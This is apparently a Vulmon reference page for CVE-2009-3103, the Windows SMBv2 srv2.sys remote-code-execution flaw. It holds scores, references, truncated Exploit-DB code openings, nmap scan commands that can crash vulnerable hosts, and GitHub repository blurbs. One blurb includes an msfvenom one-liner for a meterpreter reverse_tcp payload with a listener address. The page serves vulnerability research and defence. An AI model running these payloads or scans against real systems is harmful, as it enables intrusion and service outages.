Vulmon Recent Vulnerabilities Research Posts Trends Blog About Contact
10
CVSSv2

CVE-2009-3103

Published: 08/09/2009 Updated: 07/12/2023
CVSS v2 Base Score: 10 | Impact Score: 10 | Exploitability Score: 10
VMScore: 1000
Vector: AV:N/AC:L/Au:N/C:C/I:C/A:C
Subscribe to Microsoft

Vulnerability Summary

Array index error in the SMBv2 protocol implementation in srv2.sys in Microsoft Windows Vista Gold, SP1, and SP2, Windows Server 2008 Gold and SP2, and Windows 7 RC allows remote malicious users to execute arbitrary code or cause a denial of service (system crash) via an & (ampersand) character in a Process ID High header field in a NEGOTIATE PROTOCOL REQUEST packet, which triggers an attempted dereference of an out-of-bounds memory location, aka "SMBv2 Negotiation Vulnerability." NOTE: some of these details are obtained from third party information.

Vulnerability Trend

Vulnerable Product Search on Vulmon Subscribe to Product

microsoft windows server 2008

microsoft windows server 2008 sp2

microsoft windows vista

Exploits

Exploit DB: Microsoft Windows - 'srv2.sys' SMB Code Execution (Python) (MS09-050)
# EDB-Note: Source ~ rawgithubusercontentcom/ohnozzy/Exploit/master/MS09_050py #!/usr/bin/python #This module depends on the linux command line program smbclient #I can't find a python smb library for smb login If you can find one, you can replace that part of the code with the smb login function in python #The idea is that after th ...
Exploit DB: Microsoft Windows - SMB2 Negotiate Protocol '0x72' Response Denial of Service
#!/usr/bin/python # === EDIT – this exploit appears to be exactly the same one of one which was already found # and fixed notified by Laurent Gaffié, i did not know this but his blog post can be found here: # g-laurentblogspotcom/2009/11/windows-7-server-2008r2-remote-kernelhtml import socket,sys,time print "Maliformed negotiate pro ...
Exploit DB: Microsoft Windows 7/2008 R2 - Remote Kernel Crash
#!/usr/bin/python # win7-crashpy: # Trigger a remote kernel crash on Win7 and server 2008R2 (infinite loop) # Crash in KeAccumulateTicks() due to NT_ASSERT()/DbgRaiseAssertionFailure() caused by an #infinite loop #NO BSOD, YOU GOTTA PULL THE PLUG #To trigger it fast; from the target: \\this_script_ip_addr\BLAH , instantly crash #Author: Laurent ...
Exploit DB: Microsoft Windows - 'srv2.sys' SMB Negotiate ProcessID Function Table Dereference (MS09-050)
Microsoft SRV2SYS SMB Negotiate ProcessID Function Table Dereference --------------------------------------------------------------------- Exploited by Piotr Bania // wwwpiotrbaniacom Exploit for Vista SP2/SP1 only, should be reliable! Tested on: Vista sp2 (60600218005) Vista sp1 ultimate (60600118000) Kudos for: Stephen, HDM, Laurent G ...
Exploit DB: Microsoft Windows - 'srv2.sys' SMB Negotiate ProcessID Function Table Dereference (MS09-050) (Metasploit)
## # $Id: ms09_050_smb2_negotiate_func_indexrb 9669 2010-07-03 03:13:45Z jduck $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions Please see the Metasploit # Framework web site for more information on licensing and terms of use # metasploitcom/framework/ ## require ...
Exploit DB: Microsoft Windows Vista/7 - SMB2.0 Negotiate Protocol Request Remote Blue Screen of Death (MS07-063)
============================================= - Release date: September 7th, 2009 - Discovered by: Laurent Gaffié - Severity: High ============================================= I VULNERABILITY ------------------------- Windows Vista, Server 2008 < R2, 7 RC : SMB20 NEGOTIATE PROTOCOL REQUEST Remote BSOD II BACKGROUND ----------------- ...

Nmap Scripts

smb-vuln-cve2009-3103

Detects Microsoft Windows systems vulnerable to denial of service (CVE-2009-3103). This script will crash the service if it is vulnerable.

nmap --script smb-vuln-cve2009-3103.nse -p445 <host>
nmap -sU --script smb-vuln-cve2009-3103.nse -p U:137,T:139 <host>

Host script results:
| smb-vuln-cve2009-3103:
|   VULNERABLE:
|   SMBv2 exploit (CVE-2009-3103, Microsoft Security Advisory 975497)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2009-3103
|           Array index error in the SMBv2 protocol implementation in srv2.sys in Microsoft Windows Vista Gold, SP1, and SP2,
|           Windows Server 2008 Gold and SP2, and Windows 7 RC allows remote attackers to execute arbitrary code or cause a
|           denial of service (system crash) via an & (ampersand) character in a Process ID High header field in a NEGOTIATE
|           PROTOCOL REQUEST packet, which triggers an attempted dereference of an out-of-bounds memory location,
|           aka "SMBv2 Negotiation Vulnerability." NOTE: some of these details are obtained from third party information.
|
|     Disclosure date: 2009-09-08
|     References:
|       http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103
smb-vuln-cve2009-3103

Detects Microsoft Windows systems vulnerable to denial of service (CVE-2009-3103). This script will crash the service if it is vulnerable.

nmap --script smb-vuln-cve2009-3103.nse -p445 <host>
nmap -sU --script smb-vuln-cve2009-3103.nse -p U:137,T:139 <host>

Host script results:
| smb-vuln-cve2009-3103:
|   VULNERABLE:
|   SMBv2 exploit (CVE-2009-3103, Microsoft Security Advisory 975497)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2009-3103
|           Array index error in the SMBv2 protocol implementation in srv2.sys in Microsoft Windows Vista Gold, SP1, and SP2,
|           Windows Server 2008 Gold and SP2, and Windows 7 RC allows remote attackers to execute arbitrary code or cause a
|           denial of service (system crash) via an & (ampersand) character in a Process ID High header field in a NEGOTIATE
|           PROTOCOL REQUEST packet, which triggers an attempted dereference of an out-of-bounds memory location,
|           aka "SMBv2 Negotiation Vulnerability." NOTE: some of these details are obtained from third party information.
|
|     Disclosure date: 2009-09-08
|     References:
|       http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103

Github Repositories

https://github.com/Abdibimantara/Vulnerability-Asessment-Kioptrix-Level-1-Vulnhub

Vulnerability-Asessment-Kioptrix-Level-1-Vulnhub Repositori ini saya create untuk mendokumentasikan proses Vulnerability Assesment dari mesin Kioptirxi Level 1 dari platform Vulhub Link Source Mesin Kioptrik Level 1 dari vulnhub dapat didownload secara free pada website resminya di link : wwwvulnhubcom/entry/kioptrix-level-1-1,22/ Persiapan Virtualbox : www

https://github.com/amtzespinosa/kioptrix-walkthrough

Today we are hacking into a highly recommended beginner CTF called Kioptrix. I had some troubles installing the machine from VulnHub so, in case you face some errors, I am providing you the .OVA file for the vulnerable machine.

CTF #1 - Kioptrix Today we are hacking into a highly recommended beginner CTF called Kioptrix I had some troubles installing the machine from VulnHub so, in case you face some errors, I am providing you the OVA file for the vulnerable machine You can download it here As always, let's start with my setup: My Setup A VirtualBox VM running Kali Linux Another VM running

https://github.com/ankh2054/python-exploits

Repository for python exploits

python-exploits Repository for python exploits MS08-067 This module exploits a parsing flaw in the path canonicalization code of NetAPI32dll through the Server Service This module is capable of bypassing NX on some operating systems and service packs The correct target must be used to prevent the Server Service (along with a dozen others in the same process) from crashing W

https://github.com/mokrunka/python-exploits

Repository for python exploits

python-exploits Repository for python exploits MS08-067 This module exploits a parsing flaw in the path canonicalization code of NetAPI32dll through the Server Service This module is capable of bypassing NX on some operating systems and service packs The correct target must be used to prevent the Server Service (along with a dozen others in the same process) from crashing W

https://github.com/amtzespinosa/kioptrix-write-up

Today we are hacking into a highly recommended beginner CTF called Kioptrix. I had some troubles installing the machine from VulnHub so, in case you face some errors, I am providing you the .OVA file for the vulnerable machine.

CTF #1 - Kioptrix Today we are hacking into a highly recommended beginner CTF called Kioptrix I had some troubles installing the machine from VulnHub so, in case you face some errors, I am providing you the OVA file for the vulnerable machine You can download it here As always, let's start with my setup: My Setup A VirtualBox VM running Kali Linux Another VM running

https://github.com/Sic4rio/CVE-2009-3103---srv2.sys-SMB-Code-Execution-Python-MS09-050-

Microsoft Windows - 'srv2.sys' SMB Code Execution (Python) (MS09-050)

Microsoft-Windows---srv2sys-SMB-Code-Execution-Python-MS09-050- Microsoft Windows - 'srv2sys' SMB Code Execution (Python) (MS09-050) Exploit for CVE-2009-3103 Overview This Python script is an updated version of a public exploit for CVE-2009-3103 The original code relied on the SMBconnection module, which has been replaced in this version to make the script more v

https://github.com/Sic4rio/Microsoft-Windows---srv2.sys-SMB-Code-Execution-Python-MS09-050-

Microsoft Windows - 'srv2.sys' SMB Code Execution (Python) (MS09-050)

Microsoft-Windows---srv2sys-SMB-Code-Execution-Python-MS09-050- Microsoft Windows - 'srv2sys' SMB Code Execution (Python) (MS09-050) Exploit for CVE-2009-3103 Overview This Python script is an updated version of a public exploit for CVE-2009-3103 The original code relied on the SMBconnection module, which has been replaced in this version to make the script more v

https://github.com/rosonsec/Exploits

Public exploits and modifications

Exploits Public exploits modifications CVE-2002-0082 Apache mod_ssl &lt; 287 OpenSSL - OpenFuckV2c Remote Buffer Overflow Fixes compilation errors CVE-2009-3103 Remote Code Execution via "SMBv2 Negotiation Vulnerability" Fixes compilation errors CVE-2017-0143 aka MS17-010 Remote Code Execution vulnerability in Microsoft SMBv1 Fixes compilation errors CVE-2003-

https://github.com/sec13b/ms09-050_CVE-2009-3103

CVE-2009-3103 ms09-050

ms09-050_CVE-2009-3103 CVE-2009-3103 ms09-050 # One liner to create/generate a payload for windows msfvenom --arch x86 --platform windows --payload windows/meterpreter/reverse_tcp LHOST=19216811 LPORT=4444 --bad-chars “\x00” --encoder x86/shikata_ga_nai --iterations 10 --format exe --out /path/ One liner start meterpreter msfconsole -x "use exploit/multi/h

References

CWE-399http://archives.neohapsis.com/archives/fulldisclosure/2009-09/0090.htmlhttp://www.securityfocus.com/bid/36299http://isc.sans.org/diary.html?storyid=7093http://secunia.com/advisories/36623http://g-laurent.blogspot.com/2009/09/windows-vista7-smb20-negotiate-protocol.htmlhttp://www.us-cert.gov/cas/techalerts/TA09-286A.htmlhttp://blog.48bits.com/?p=510http://www.securitytracker.com/id?1022848http://www.reversemode.com/index.php?option=com_content&task=view&id=64&Itemid=1http://www.microsoft.com/technet/security/advisory/975497.mspxhttp://osvdb.org/57799http://www.kb.cert.org/vuls/id/135940https://exchange.xforce.ibmcloud.com/vulnerabilities/53090https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A6489http://www.exploit-db.com/exploits/9594http://www.securityfocus.com/archive/1/506327/100/0/threadedhttp://www.securityfocus.com/archive/1/506300/100/0/threadedhttps://docs.microsoft.com/en-us/security-updates/securitybulletins/2009/ms09-050https://nvd.nist.govhttps://www.exploit-db.com/exploits/40280/https://github.com/amtzespinosa/kioptrix-walkthroughhttps://www.kb.cert.org/vuls/id/135940
CVSSv3
CVSSv2
CVSSv3
VMScore
Recommendations:
deserializationCVE-2024-4040cross-site scriptingCVE-2023-25790CVE-2024-2961XML external entityCVE-2024-26926CVE-2024-32806CVE-2024-32711
Vulnerability Notification Service
You don’t have to wait for vulnerability scanning results
Get Started

Vulmon Search

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

About

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Products

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Connect

Twitter Reddit Linkedin Facebook